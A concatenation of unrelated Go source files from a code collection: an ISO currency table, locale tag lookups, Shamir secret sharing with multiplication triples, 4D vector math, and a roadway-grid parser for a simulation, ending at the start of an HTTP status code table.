Currency{Numeric: "760", ISO: "SYP", Decimals: 2, Name: "Syrian Pound"},
Currency{Numeric: "764", ISO: "THB", Decimals: 2, Name: "Baht"},
Currency{Numeric: "776", ISO: "TOP", Decimals: 2, Name: "Pa’anga"},
Currency{Numeric: "780", ISO: "TTD", Decimals: 2, Name: "Trinidad and Tobago Dollar"},
Currency{Numeric: "784", ISO: "AED", Decimals: 2, Name: "UAE Dirham"},
Currency{Numeric: "788", ISO: "TND", Decimals: 3, Name: "Tunisian Dinar"},
Currency{Numeric: "800", ISO: "UGX", Decimals: 0, Name: "Uganda Shilling"},
Currency{Numeric: "807", ISO: "MKD", Decimals: 2, Name: "Denar"},
Currency{Numeric: "818", ISO: "EGP", Decimals: 2, Name: "Egyptian Pound"},
Currency{Numeric: "826", ISO: "GBP", Decimals: 2, Name: "Pound Sterling"},
Currency{Numeric: "834", ISO: "TZS", Decimals: 2, Name: "Tanzanian Shilling"},
Currency{Numeric: "840", ISO: "USD", Decimals: 2, Name: "US Dollar"},
Currency{Numeric: "858", ISO: "UYU", Decimals: 2, Name: "Peso Uruguayo"},
Currency{Numeric: "860", ISO: "UZS", Decimals: 2, Name: "Uzbekistan Sum"},
Currency{Numeric: "882", ISO: "WST", Decimals: 2, Name: "Tala"},
Currency{Numeric: "886", ISO: "YER", Decimals: 2, Name: "Yemeni Rial"},
Currency{Numeric: "901", ISO: "TWD", Decimals: 2, Name: "New Taiwan Dollar"},
Currency{Numeric: "927", ISO: "UYW", Decimals: 4, Name: "Unidad Previsional"},
Currency{Numeric: "928", ISO: "VES", Decimals: 2, Name: "Bolívar Soberano"},
Currency{Numeric: "929", ISO: "MRU", Decimals: 2, Name: "Ouguiya"},
Currency{Numeric: "930", ISO: "STN", Decimals: 2, Name: "Dobra"},
Currency{Numeric: "931", ISO: "CUC", Decimals: 2, Name: "Peso Convertible"},
Currency{Numeric: "932", ISO: "ZWL", Decimals: 2, Name: "Zimbabwe Dollar"},
Currency{Numeric: "933", ISO: "BYN", Decimals: 2, Name: "Belarusian Ruble"},
Currency{Numeric: "934", ISO: "TMT", Decimals: 2, Name: "Turkmenistan New Manat"},
Currency{Numeric: "936", ISO: "GHS", Decimals: 2, Name: "Ghana Cedi"},
Currency{Numeric: "938", ISO: "SDG", Decimals: 2, Name: "Sudanese Pound"},
Currency{Numeric: "940", ISO: "UYI", Decimals: 0, Name: "Uruguay Peso en Unidades Indexadas (UI)"},
Currency{Numeric: "941", ISO: "RSD", Decimals: 2, Name: "Serbian Dinar"},
Currency{Numeric: "943", ISO: "MZN", Decimals: 2, Name: "Mozambique Metical"},
Currency{Numeric: "944", ISO: "AZN", Decimals: 2, Name: "Azerbaijan Manat"},
Currency{Numeric: "946", ISO: "RON", Decimals: 2, Name: "Romanian Leu"},
Currency{Numeric: "947", ISO: "CHE", Decimals: 2, Name: "WIR Euro"},
Currency{Numeric: "948", ISO: "CHW", Decimals: 2, Name: "WIR Franc"},
Currency{Numeric: "949", ISO: "TRY", Decimals: 2, Name: "Turkish Lira"},
Currency{Numeric: "950", ISO: "XAF", Decimals: 0, Name: "CFA Franc BEAC"},
Currency{Numeric: "951", ISO: "XCD", Decimals: 2, Name: "East Caribbean Dollar"},
Currency{Numeric: "952", ISO: "XOF", Decimals: 0, Name: "CFA Franc BCEAO"},
Currency{Numeric: "953", ISO: "XPF", Decimals: 0, Name: "CFP Franc"},
Currency{Numeric: "967", ISO: "ZMW", Decimals: 2, Name: "Zambian Kwacha"},
Currency{Numeric: "968", ISO: "SRD", Decimals: 2, Name: "Surinam Dollar"},
Currency{Numeric: "969", ISO: "MGA", Decimals: 2, Name: "Malagasy Ariary"},
Currency{Numeric: "970", ISO: "COU", Decimals: 2, Name: "Unidad de Valor Real"},
Currency{Numeric: "971", ISO: "AFN", Decimals: 2, Name: "Afghani"},
Currency{Numeric: "972", ISO: "TJS", Decimals: 2, Name: "Somoni"},
Currency{Numeric: "973", ISO: "AOA", Decimals: 2, Name: "Kwanza"},
Currency{Numeric: "975", ISO: "BGN", Decimals: 2, Name: "Bulgarian Lev"},
Currency{Numeric: "976", ISO: "CDF", Decimals: 2, Name: "Congolese Franc"},
Currency{Numeric: "977", ISO: "BAM", Decimals: 2, Name: "Convertible Mark"},
Currency{Numeric: "978", ISO: "EUR", Decimals: 2, Name: "Euro"},
Currency{Numeric: "979", ISO: "MXV", Decimals: 2, Name: "Mexican Unidad de Inversion (UDI)"},
Currency{Numeric: "980", ISO: "UAH", Decimals: 2, Name: "Hryvnia"},
Currency{Numeric: "981", ISO: "GEL", Decimals: 2, Name: "Lari"},
Currency{Numeric: "984", ISO: "BOV", Decimals: 2, Name: "Mvdol"},
Currency{Numeric: "985", ISO: "PLN", Decimals: 2, Name: "Zloty"},
Currency{Numeric: "986", ISO: "BRL", Decimals: 2, Name: "Brazilian Real"},
Currency{Numeric: "990", ISO: "CLF", Decimals: 4, Name: "Unidad de Fomento"},
// Registering testing currency
xts,
)
}
package locale
import (
"sort"
)
// A lang id is a 1-based index into a lookup string made of
// concatenated 3-byte blocks, each holding a (space-padded) language
// code.
type langID uint8

type langLookup string

// lang returns the language code stored under id, with trailing
// padding spaces removed. The zero id or an out-of-range id yields "".
func (l langLookup) lang(id langID) string {
	if id == 0 || int(id)*3 > len(l) {
		return ""
	}
	code := l[(int(id)-1)*3 : int(id)*3]
	trimmed := len(code)
	for trimmed > 0 && code[trimmed-1] == ' ' {
		trimmed--
	}
	return string(code[:trimmed])
}

// langID binary-searches the sorted lookup for str and returns its
// 1-based id, or 0 when str is not present.
func (l langLookup) langID(str []byte) langID {
	n := len(l) / 3
	idx := sort.Search(n, func(i int) bool {
		return l[i*3:(i+1)*3] >= langLookup(str)
	})
	if idx == n {
		return 0
	}
	candidate := langID(idx + 1)
	if l.lang(candidate) == string(str) {
		return candidate
	}
	return 0
}
// A script id is a 1-based index into a lookup string made of
// concatenated 4-byte blocks, each holding a (space-padded) script
// code.
type scriptID uint8

type scriptLookup string

// script returns the script code stored under id, with trailing
// padding spaces removed. The zero id or an out-of-range id yields "".
func (l scriptLookup) script(id scriptID) string {
	if id == 0 || int(id)*4 > len(l) {
		return ""
	}
	code := l[(int(id)-1)*4 : int(id)*4]
	trimmed := len(code)
	for trimmed > 0 && code[trimmed-1] == ' ' {
		trimmed--
	}
	return string(code[:trimmed])
}

// scriptID binary-searches the sorted lookup for str and returns its
// 1-based id, or 0 when str is not present.
func (l scriptLookup) scriptID(str []byte) scriptID {
	n := len(l) / 4
	idx := sort.Search(n, func(i int) bool {
		return l[i*4:(i+1)*4] >= scriptLookup(str)
	})
	if idx == n {
		return 0
	}
	candidate := scriptID(idx + 1)
	if l.script(candidate) == string(str) {
		return candidate
	}
	return 0
}
// A region id is an identifier of a specific fixed-width string and defines
// a 1-based index into a lookup string. The lookup consists of concatenated
// blocks of size 3, where each block contains a region string.
type regionID uint8

type regionLookup string

// region returns the region code stored under id, with trailing padding
// spaces trimmed. Returns "" for id 0 or an id past the end of the lookup.
func (l regionLookup) region(id regionID) string {
	if id == 0 || 3*int(id) > len(l) {
		return ""
	}
	code := l[int(id-1)*3 : int(id)*3]
	// Trim the space padding used for codes shorter than 3 bytes.
	end := 3
	for end > 0 && code[end-1] == ' ' {
		end--
	}
	return string(code[:end])
}

// regionID binary-searches the sorted lookup for str and returns its
// 1-based id, or 0 when str is not present.
func (l regionLookup) regionID(str []byte) regionID {
	idx := sort.Search(len(l)/3, func(i int) bool {
		return l[i*3:(i+1)*3] >= regionLookup(str)
	})
	if idx*3 < len(l) && l.region(regionID(idx+1)) == string(str) {
		return regionID(idx + 1)
	}
	return 0
}
// A tag is a tuple consisting of the language subtag, the script subtag,
// and the region subtag, packed as (lang << 16) | (script << 8) | region.
// The tag lookup is an ordered list of tags and the tag id is a 1-based
// index of this list.
type tag uint32

// langID extracts the language subtag id from the packed tag.
func (t tag) langID() langID {
	return langID(byte(t >> 16))
}

// scriptID extracts the script subtag id from the packed tag.
func (t tag) scriptID() scriptID {
	return scriptID(byte(t >> 8))
}

// regionID extracts the region subtag id from the packed tag.
func (t tag) regionID() regionID {
	return regionID(byte(t))
}
type tagID uint16

// tagLookup is an ordered list of packed tags; a tagID is a 1-based
// index into it.
type tagLookup []tag

// tag returns the packed tag for id, or 0 for id 0 or out of range.
func (l tagLookup) tag(id tagID) tag {
	if id == 0 || int(id) > len(l) {
		return 0
	}
	return l[id-1]
}

// tagID binary-searches the sorted list for the packed combination of
// lang, script and region, returning its 1-based id or 0 if absent.
func (l tagLookup) tagID(lang langID, script scriptID, region regionID) tagID {
	t := (tag(lang) << 16) | (tag(script) << 8) | tag(region)
	idx := sort.Search(len(l), func(i int) bool {
		return l[i] >= t
	})
	if idx < len(l) && l[idx] == t {
		return tagID(idx + 1)
	}
	return 0
}
// A region containment is a tuple consisting of a 2-letter region code and
// a list of region subtag ids. The lookup maps an alphabetic region code (the child)
// to a list of containing regions (the parents). Each entry in the mapping is
// encoded as "RR\xnn\xp1...\xpn", where RR is the child region code, n the number
// of parent subtag ids and p1, ..., pn the parent subtag ids.
type regionContainmentLookup string

// containmentIDs looks up the parents of the given 2-letter region code
// and copies them into parents, returning how many were filled in.
// The length of parents fixes the per-entry block size of the lookup,
// so it must match the size the lookup table was generated with.
// Returns 0 when region is malformed or has no entry.
func (l regionContainmentLookup) containmentIDs(region []byte, parents []regionID) int {
	// The length of parents specifies the number of containment ids per block.
	if len(region) != 2 {
		return 0
	}
	blocksize := 2 + 1*len(parents)
	idx := sort.Search(len(l)/blocksize, func(i int) bool {
		i *= blocksize
		return l[i:i+2] >= regionContainmentLookup(region)
	})
	idx *= blocksize
	if idx < len(l) && l[idx:idx+2] == regionContainmentLookup(region) {
		for i := 0; i < len(parents); i++ {
			start := idx + i
			// Parent ids start 2 bytes into the block, after the code.
			parents[i] = regionID(l[start+2])
			// A zero id terminates the parent list early.
			if parents[i] == 0 {
				return i
			}
		}
		return len(parents)
	}
	return 0
}
// The parent tag lookup is an ordered list of tag id pairs. Each pair consists
// of a child id and a parent id.
type parentTagLookup []uint32 // tag id => tag id
func (l parentTagLookup) parentID(child tagID) tagID {
idx := sort.Search(len(l), func(i int) bool {
return tagID(l[i]>>16) >= child
})
if idx < len(l) && tagID(l[idx]>>16) == child {
return tagID(l[idx] & 0xffff)
}
return 0
} | internal/locale/tags.go | 0.658857 | 0.403626 | tags.go | starcoder |
package shamir
import (
"errors"
"github.com/superarius/shamir/modular"
)
// Share is one point (X, Y) of a Shamir secret share, where Y is the
// sharing polynomial evaluated at X (all arithmetic mod P).
type Share struct {
	// X is the share's x-coordinate (assigned as 1, 2, 3, ... in Shares).
	X *modular.Int
	// Y is the polynomial value at X.
	Y *modular.Int
}
// Shares splits the secret raw into `total` Shamir shares such that any
// `threshold` of them suffice to reconstruct it. Returns an error when
// threshold exceeds total or when the secret is not below the field
// modulus.
func Shares(threshold, total int, raw []byte) ([]*Share, error) {
	if threshold > total {
		return nil, errors.New("cannot require more shares then existing")
	}
	// Convert the secret to modular Int
	secret := modular.IntFromBytes(raw)
	if !secret.IsModP() {
		return nil, errors.New("secret is too large to encrypt")
	}
	// Create the polynomial of degree (threshold - 1).
	// The constant term is the secret; remaining coefficients are random.
	polynomial := make([]*modular.Int, threshold)
	polynomial[0] = secret
	for j := range polynomial[1:] {
		r, err := modular.RandInt()
		if err != nil {
			return nil, err
		}
		polynomial[j+1] = r
	}
	// Create the (x, y) points of each share.
	result := make([]*Share, total)
	for i := range result {
		// x-coordinate (taken as Natural Numbers 1,2,3...)
		x := modular.NewInt(int64(i+1))
		// evaluate the random polynomial at x
		result[i] = &Share{
			X: x,
			Y: EvaluatePolynomial(polynomial, x),
		}
	}
	return result, nil
}
// Reconstruct recovers the shared secret from at least threshold
// shares via Lagrange interpolation at x = 0. Shares beyond the
// threshold are ignored; fewer than threshold is an error.
func Reconstruct(shares []*Share, threshold int) (*modular.Int, error) {
	if len(shares) < threshold {
		// Fixed typo in the error message ("interoplation").
		return nil, errors.New("not enough shares for interpolation")
	}
	if len(shares) > threshold {
		shares = shares[:threshold]
	}
	// Use Lagrange Polynomial Interpolation to reconstruct the secret.
	secret := InterpolateAtZero(shares)
	return secret, nil
}
// Add sets the receiver to the component-wise sum of the given shares:
// X is copied from the first share and Y is the sum of all Y values.
// Panics when called with no arguments. Returns the receiver.
func (share *Share) Add(shares ...*Share) *Share {
	share.X = shares[0].X
	share.Y = modular.NewInt(0)
	for _, s := range shares {
		share.Y.Add(share.Y, s.Y)
	}
	return share
}

// ScalarMul sets the receiver to the share x with its Y value
// multiplied by the public scalar n. Returns the receiver.
func (share *Share) ScalarMul(x *Share, n *modular.Int) *Share {
	share.X = x.X
	share.Y = new(modular.Int).Mul(x.Y, n)
	return share
}

// ScalarAdd sets the receiver to the share x with the public scalar n
// added to its Y value. Returns the receiver.
func (share *Share) ScalarAdd(x *Share, n *modular.Int) *Share {
	num := new(modular.Int).Add(x.Y, n)
	share.X = x.X
	share.Y = num
	return share
}
// Triple holds one party's shares of a multiplication triple
// (A, B, C) with C = A*B, used to multiply secret-shared values
// (see PrepareMul / FinishMul).
type Triple struct {
	A *Share
	B *Share
	C *Share
}

// TripleShares generates shares of a fresh random multiplication
// triple for n parties with reconstruction threshold t. Element i of
// the result holds party i's shares of A, B and C = A*B.
func TripleShares(t, n int) ([]*Triple, error) {
	a, err := modular.RandInt()
	if err != nil {
		return nil, err
	}
	b, err := modular.RandInt()
	if err != nil {
		return nil, err
	}
	c := new(modular.Int).Mul(a, b)
	ashares, err := Shares(t, n, a.Bytes())
	if err != nil {
		return nil, err
	}
	bshares, err := Shares(t, n, b.Bytes())
	if err != nil {
		return nil, err
	}
	cshares, err := Shares(t, n, c.Bytes())
	if err != nil {
		return nil, err
	}
	// Regroup so each party receives its own (A, B, C) share bundle.
	triples := make([]*Triple, n)
	for i := range triples {
		triples[i] = &Triple {
			A: ashares[i],
			B: bshares[i],
			C: cshares[i],
		}
	}
	return triples, nil
}
// NewTriples generates `triples` multiplication triples shared with
// threshold t among n parties, regrouped per party: the result is
// indexed [party][triple].
func NewTriples(triples int, t, n int) ([][]*Triple, error) {
	all := make([][]*Triple, triples)
	// Idiomatic counting for-loop (was a manual while-style loop).
	for i := 0; i < triples; i++ {
		ts, err := TripleShares(t, n)
		if err != nil {
			return nil, err
		}
		all[i] = ts
	}
	// Transpose: collect the i-th share of every triple under party i.
	out := make([][]*Triple, n)
	for i := range out {
		out[i] = make([]*Triple, triples)
		for j, a := range all {
			out[i][j] = a[i]
		}
	}
	return out, nil
}
// NewBatchedTriples generates ten_ks batches of 10000 multiplication
// triples each, shared with threshold t among n parties.
func NewBatchedTriples(ten_ks int, t, n int) ([][][]*Triple, error) {
	batches := make([][][]*Triple, ten_ks)
	// Idiomatic counting for-loop (was a manual while-style loop).
	for i := 0; i < ten_ks; i++ {
		ts, err := NewTriples(10000, t, n)
		if err != nil {
			return nil, err
		}
		batches[i] = ts
	}
	return batches, nil
}
// PrepareMul computes this party's shares of (x - a) and (y - b) for
// the share-multiplication protocol; these masked shares can be
// exchanged for reconstruction without revealing x or y.
func PrepareMul(x, y *Share, triple *Triple) (*Share, *Share) {
	neg1 := modular.NewInt(-1)
	negA := new(Share).ScalarMul(triple.A, neg1)
	negB := new(Share).ScalarMul(triple.B, neg1)
	xas := new(Share).Add(x, negA)
	ybs := new(Share).Add(y, negB)
	return xas, ybs
}

// FinishMul reconstructs epsilon = x - a and rho = y - b from the
// collected shares and returns this party's share of x*y, computed as
// epsilon*y + rho*x + c - epsilon*rho.
func FinishMul(x_a []*Share, y_b []*Share, x, y *Share, triple *Triple) (*Share, error) {
	epsilon, err := Reconstruct(x_a, len(x_a))
	if err != nil {
		return nil, err
	}
	rho, err := Reconstruct(y_b, len(y_b))
	if err != nil {
		return nil, err
	}
	// ner = -(epsilon * rho): the public correction term.
	ner := new(modular.Int).Mul(epsilon, rho)
	ner.Mul(ner, modular.NewInt(-1))
	term1 := new(Share).ScalarMul(y, epsilon)
	term2 := new(Share).ScalarMul(x, rho)
	t3 := new(Share).Add(term1, term2, triple.C)
	out := new(Share).ScalarAdd(t3, ner)
	return out, nil
}
package vmath
import (
"fmt"
"github.com/maja42/vmath/math32"
)
// Vec4f is a four-component float32 vector.
type Vec4f [4]float32

// String returns a human-readable representation of the vector.
func (v Vec4f) String() string {
	return v.Format("Vec4f[%f x %f x %f x %f]")
}

// Format the vector to a string. The format string receives the four
// components in x, y, z, w order.
func (v Vec4f) Format(format string) string {
	return fmt.Sprintf(format, v[0], v[1], v[2], v[3])
}
// Vec4i returns an integer representation of the vector.
// Decimals are truncated (rounded toward zero).
func (v Vec4f) Vec4i() Vec4i {
	return Vec4i{int(v[0]), int(v[1]), int(v[2]), int(v[3])}
}

// Round returns an integer representation of the vector.
// Decimals are rounded to the nearest integer.
func (v Vec4f) Round() Vec4i {
	return Vec4i{
		int(math32.Round(v[0])),
		int(math32.Round(v[1])),
		int(math32.Round(v[2])),
		int(math32.Round(v[3]))}
}
// Split returns the vector's components as individual values.
func (v Vec4f) Split() (x, y, z, w float32) {
	return v[0], v[1], v[2], v[3]
}

// X returns the vector's first component.
// Performance is equivalent to using v[0].
func (v Vec4f) X() float32 {
	return v[0]
}

// Y returns the vector's second component.
// Performance is equivalent to using v[1].
func (v Vec4f) Y() float32 {
	return v[1]
}

// Z returns the vector's third component.
// Performance is equivalent to using v[2].
func (v Vec4f) Z() float32 {
	return v[2]
}

// W returns the vector's fourth component.
// Performance is equivalent to using v[3].
func (v Vec4f) W() float32 {
	return v[3]
}

// XY returns a 2D vector with the X and Y components (Z and W are dropped).
func (v Vec4f) XY() Vec2f {
	return Vec2f{v[0], v[1]}
}

// XYZ returns a 3D vector with the X, Y and Z components (W is dropped).
func (v Vec4f) XYZ() Vec3f {
	return Vec3f{v[0], v[1], v[2]}
}

// Abs returns a vector with the components turned into absolute values.
func (v Vec4f) Abs() Vec4f {
	return Vec4f{math32.Abs(v[0]), math32.Abs(v[1]), math32.Abs(v[2]), math32.Abs(v[3])}
}
// Add performs component-wise addition.
func (v Vec4f) Add(other Vec4f) Vec4f {
	var out Vec4f
	for i := range out {
		out[i] = v[i] + other[i]
	}
	return out
}

// AddScalar performs a component-wise scalar addition.
func (v Vec4f) AddScalar(s float32) Vec4f {
	var out Vec4f
	for i := range out {
		out[i] = v[i] + s
	}
	return out
}

// Sub performs component-wise subtraction.
func (v Vec4f) Sub(other Vec4f) Vec4f {
	var out Vec4f
	for i := range out {
		out[i] = v[i] - other[i]
	}
	return out
}

// SubScalar performs a component-wise scalar subtraction.
func (v Vec4f) SubScalar(s float32) Vec4f {
	var out Vec4f
	for i := range out {
		out[i] = v[i] - s
	}
	return out
}

// Mul performs a component-wise multiplication.
func (v Vec4f) Mul(other Vec4f) Vec4f {
	var out Vec4f
	for i := range out {
		out[i] = v[i] * other[i]
	}
	return out
}

// MulScalar performs a scalar multiplication.
func (v Vec4f) MulScalar(s float32) Vec4f {
	var out Vec4f
	for i := range out {
		out[i] = v[i] * s
	}
	return out
}

// Div performs a component-wise division.
func (v Vec4f) Div(other Vec4f) Vec4f {
	var out Vec4f
	for i := range out {
		out[i] = v[i] / other[i]
	}
	return out
}

// DivScalar performs a scalar division.
func (v Vec4f) DivScalar(s float32) Vec4f {
	var out Vec4f
	for i := range out {
		out[i] = v[i] / s
	}
	return out
}
// Normalize the vector. Its length will be 1 afterwards.
// If the vector's length is zero, a zero vector will be returned.
// NOTE(review): the zero test delegates to the project helper Equalf;
// confirm it behaves sensibly when comparing against exactly 0.
func (v Vec4f) Normalize() Vec4f {
	length := v.Length()
	if Equalf(length, 0) {
		return Vec4f{}
	}
	return Vec4f{v[0] / length, v[1] / length, v[2] / length, v[3] / length}
}

// Length returns the vector's length (euclidean norm).
func (v Vec4f) Length() float32 {
	return math32.Sqrt(v[0]*v[0] + v[1]*v[1] + v[2]*v[2] + v[3]*v[3])
}

// SquareLength returns the vector's squared length, avoiding the
// square root required by Length.
func (v Vec4f) SquareLength() float32 {
	return v[0]*v[0] + v[1]*v[1] + v[2]*v[2] + v[3]*v[3]
}
// IsZero returns true if all components are zero.
// Uses the default Epsilon as relative tolerance.
func (v Vec4f) IsZero() bool {
	return v.EqualEps(Vec4f{}, Epsilon)
}

// Equal compares two vectors component-wise.
// Uses the default Epsilon as relative tolerance.
func (v Vec4f) Equal(other Vec4f) bool {
	return v.EqualEps(other, Epsilon)
}

// EqualEps compares two vectors component-wise, using the given epsilon as a relative tolerance.
// All four components must match for the vectors to be considered equal.
func (v Vec4f) EqualEps(other Vec4f, epsilon float32) bool {
	return EqualEps(v[0], other[0], epsilon) &&
		EqualEps(v[1], other[1], epsilon) &&
		EqualEps(v[2], other[2], epsilon) &&
		EqualEps(v[3], other[3], epsilon)
}

// Clamp clamps each component independently to the range of [min, max].
func (v Vec4f) Clamp(min, max float32) Vec4f {
	return Vec4f{
		Clampf(v[0], min, max),
		Clampf(v[1], min, max),
		Clampf(v[2], min, max),
		Clampf(v[3], min, max),
	}
}
// Negate inverts (negates) all components.
func (v Vec4f) Negate() Vec4f {
	return Vec4f{-v[0], -v[1], -v[2], -v[3]}
}

// Dot performs a dot product with another vector.
func (v Vec4f) Dot(other Vec4f) float32 {
	return v[0]*other[0] + v[1]*other[1] + v[2]*other[2] + v[3]*other[3]
}

// Project returns a vector representing the projection of vector v onto "other".
// NOTE(review): divides by other.SquareLength() without a zero check;
// a zero-length "other" yields NaN/Inf components.
func (v Vec4f) Project(other Vec4f) Vec4f {
	return other.MulScalar(v.Dot(other) / other.SquareLength())
}

// Lerp performs a linear interpolation between two vectors.
// The parameter t should be in range [0, 1]: t=0 yields v, t=1 yields other.
func (v Vec4f) Lerp(other Vec4f, t float32) Vec4f {
	return other.Sub(v).MulScalar(t).Add(v)
}

// Distance returns the euclidean distance to another position.
func (v Vec4f) Distance(other Vec4f) float32 {
	return other.Sub(v).Length()
}

// SquareDistance returns the squared euclidean distance to another position.
func (v Vec4f) SquareDistance(other Vec4f) float32 {
	return other.Sub(v).SquareLength()
}
package roadway
import (
"fmt"
"go-experiments/common/commonio"
"go-experiments/common/commonmath"
"go-experiments/voxelli/config"
"go-experiments/voxelli/geometry"
"math"
"strconv"
"strings"
"github.com/go-gl/mathgl/mgl32"
)
// Defines the road types that exist in our file.
type RoadType int
// Ordering is important! Road types are parsed according to these constant values.
const (
NotARoadType RoadType = iota
StraightRoadType
CurvedRoadType
MaxRoadType
)
// Defines a generic road element occupying one grid cell of the roadway.
type Road interface {
	// Returns true if the position is in-bounds on the road.
	// position: Normalized from (0, 0) to GetRoadBounds(), guaranteed to be within the road piece
	InBounds(position mgl32.Vec2) bool

	// Gets the bounds of the road piece.
	// gridPos is the element's cell index in the roadway grid.
	GetBounds(gridPos commonMath.IntVec2) []geometry.Intersectable
}
// newRoad constructs the Road implementation matching roadType.
// optionalData carries per-type configuration: the rotated flag for
// straight roads and the rotation value for curved roads.
func newRoad(roadType RoadType, optionalData int) Road {
	switch roadType {
	case StraightRoadType:
		return StraightRoad{rotated: optionalData != 0}
	case CurvedRoadType:
		return CurvedRoad{rotation: optionalData}
	}

	// NotARoadType and any unknown value both map to out-of-bounds.
	return OutOfBoundsRoad{}
}
// getOffsetPosition shifts a world position by half a grid cell so the
// roadway grid can be indexed from (0, 0). Inverse of getRealPosition.
func getOffsetPosition(position mgl32.Vec2) mgl32.Vec2 {
	return position.Add(mgl32.Vec2{float32(GetGridSize() / 2), float32(GetGridSize() / 2)})
}

// getGridIdx returns the grid cell index containing an offset position.
func getGridIdx(position mgl32.Vec2) commonMath.IntVec2 {
	return commonMath.IntVec2{
		int(position.X() / float32(GetGridSize())),
		int(position.Y() / float32(GetGridSize()))}
}

// getGridRelativePos converts an offset position into coordinates
// relative to the origin of the given grid cell.
func getGridRelativePos(gridIdx commonMath.IntVec2, position mgl32.Vec2) mgl32.Vec2 {
	return position.Sub(mgl32.Vec2{float32(gridIdx.X() * GetGridSize()), float32(gridIdx.Y() * GetGridSize())})
}

// getRealPosition is the inverse of getOffsetPosition, mapping an
// offset position back to world coordinates.
func getRealPosition(position mgl32.Vec2) mgl32.Vec2 {
	return position.Sub(mgl32.Vec2{float32(GetGridSize() / 2), float32(GetGridSize() / 2)})
}
// Defines a 2D roadway with road elements, plus the flattened list of
// every element's boundary geometry for intersection queries.
type Roadway struct {
	roadElements [][]Road
	roadParts    []geometry.Intersectable
}

// InBounds reports whether the given world position lies on a road.
func (r *Roadway) InBounds(position mgl32.Vec2) bool {
	offsetPos := getOffsetPosition(position)

	// Outside of the entire road grid. The upper comparisons use >=
	// (was >) so a position exactly on the far edge cannot produce a
	// grid index one past the end of roadElements below.
	if offsetPos.X() < 0 || offsetPos.Y() < 0 || offsetPos.X() >= float32(GetGridSize()*len(r.roadElements)) || offsetPos.Y() >= float32(GetGridSize()*len(r.roadElements[0])) {
		return false
	}

	gridIdx := getGridIdx(offsetPos)
	offsetPos = getGridRelativePos(gridIdx, offsetPos)
	return r.roadElements[gridIdx.X()][gridIdx.Y()].InBounds(offsetPos)
}
// GetRoadElementIdx returns the grid cell index containing the given
// world position.
func (r *Roadway) GetRoadElementIdx(position mgl32.Vec2) commonMath.IntVec2 {
	return getGridIdx(getOffsetPosition(position))
}

// InAllBounds reports whether every given position is on a road.
func (r *Roadway) InAllBounds(positions []mgl32.Vec2) bool {
	for i := range positions {
		if !r.InBounds(positions[i]) {
			return false
		}
	}
	return true
}
// Given positions and directions, gets the distance and normal of each intersection.
// Positions are world coordinates; the search runs in offset (grid)
// coordinates and converts intersection points back for distance math.
func (r *Roadway) GetBoundaries(positions []mgl32.Vec2, directions []mgl32.Vec2) ([]float32, []mgl32.Vec2) {
	boundaryLengths := make([]float32, len(positions))
	normals := make([]mgl32.Vec2, len(positions))
	for i, position := range positions {
		if !r.InBounds(position) {
			// NOTE(review): this assignment is always overwritten by the
			// code below, so it is dead -- a `continue` (and setting
			// normals[i]) looks intended here. Confirm before changing.
			boundaryLengths[i] = 0.0
		}
		offsetPosition := getOffsetPosition(position)
		vector := geometry.NewVector(offsetPosition, directions[i])
		// Brute-force find the closest intersection by looking at the *entire* roadway
		hasIntersection := false
		minIntersectionDist := float32(math.MaxFloat32)
		minNormal := mgl32.Vec2{0, 0}
		for _, intersectable := range r.roadParts {
			if intersects, intersectionPoint, intersectionNormal := intersectable.Intersects(vector); intersects {
				realPos := getRealPosition(intersectionPoint)
				intersectionLen := realPos.Sub(position).Len()
				if intersectionLen < minIntersectionDist {
					minIntersectionDist = intersectionLen
					minNormal = intersectionNormal
					hasIntersection = true
				}
			}
		}
		if hasIntersection {
			boundaryLengths[i] = minIntersectionDist
			normals[i] = minNormal
		} else {
			boundaryLengths[i] = 10000.0 // External bounding box
			normals[i] = mgl32.Vec2{1, 0}
		}
	}
	return boundaryLengths, normals
}
// GetGridSize returns the side length of one roadway grid cell
// (the 2D bounds of road elements), taken from the simulation config.
func GetGridSize() int {
	return config.Config.Simulation.RoadwaySize
}
// ParseInt parses item as a base-10, 32-bit integer, panicking on any
// parse failure.
func ParseInt(item string) int {
	parsed, err := strconv.ParseInt(item, 10, 32)
	if err != nil {
		panic(err)
	}
	return int(parsed)
}
// ParseRoadType parses item as a RoadType, panicking when the parsed
// value falls outside the valid range [0, MaxRoadType).
func ParseRoadType(item string) RoadType {
	parsed := ParseInt(item)
	if parsed >= 0 && parsed < int(MaxRoadType) {
		return RoadType(parsed)
	}
	panic(fmt.Sprintf("Did not parse a road type, parsed %v instead.", parsed))
}
func NewRoadway(fileName string) *Roadway {
newlineSplitFunction := func(c rune) bool {
return c == '\n' || c == '\r'
}
spaceSplitFunction := func(c rune) bool {
return c == ' ' || c == '\t'
}
file := commonIo.ReadFile(fileName)
lines := strings.FieldsFunc(file, newlineSplitFunction)
if len(lines) < 3 {
panic("Expected at least three lines in the file, not enough found.")
}
fmt.Printf("Roadway information: %v\n", lines[0])
// The roadway format corresponds to what you see when you edit it.
// The first line can be a comment. No other comments are allowed.
// *empty* newlines are allowed anywhere in the format
// Line 1: xSize
// Line 2: ySize
xSize := ParseInt(lines[1])
ySize := ParseInt(lines[2])
fmt.Printf("Started parsing a roadway grid of size [%v, %v]\n", xSize, ySize)
// Remaining lines: Y lines, flipped upside down to match the screen display
// Any number of spaces or tabs can be used for item delimiters
// Items are defined as RoadType:OptionalValue
if len(lines) < 3+ySize {
panic(fmt.Sprintf("Did not find enough lines to parse the full roadway grid, Found %v, expected %v", len(lines), ySize+3))
}
roadway := Roadway{roadElements: make([][]Road, xSize)}
for i, _ := range roadway.roadElements {
roadway.roadElements[i] = make([]Road, ySize)
}
for j, line := range lines[3:] {
roadParts := strings.FieldsFunc(line, spaceSplitFunction)
if len(roadParts) != xSize {
panic(fmt.Sprintf("Found %v road elements, expected %v", len(roadParts), xSize))
}
for i, part := range roadParts {
subParts := strings.Split(part, ":")
roadType := ParseRoadType(subParts[0])
optionalData := 0 // Default if the item takes in optional data but does not use it.
if len(subParts) > 1 {
// We have optional data. Create it
optionalData = ParseInt(subParts[1])
}
newRoad := newRoad(roadType, optionalData)
roadway.roadElements[xSize-(i+1)][j] = newRoad
roadway.roadParts = append(roadway.roadParts, newRoad.GetBounds(commonMath.IntVec2{xSize - (i + 1), j})...)
}
}
fmt.Printf("Roadway size: [%v, %v]\n\n", len(roadway.roadElements), len(roadway.roadElements[0]))
return &roadway
} | voxelli/roadway/roadway.go | 0.784608 | 0.544741 | roadway.go | starcoder |
package main
import (
"errors"
)
var (
corpus = map[int]*httpcode{
100: {
100,
"Continue",
"This interim response indicates that everything so far is OK and that the client should continue the request, or ignore the response if the request is already finished.",
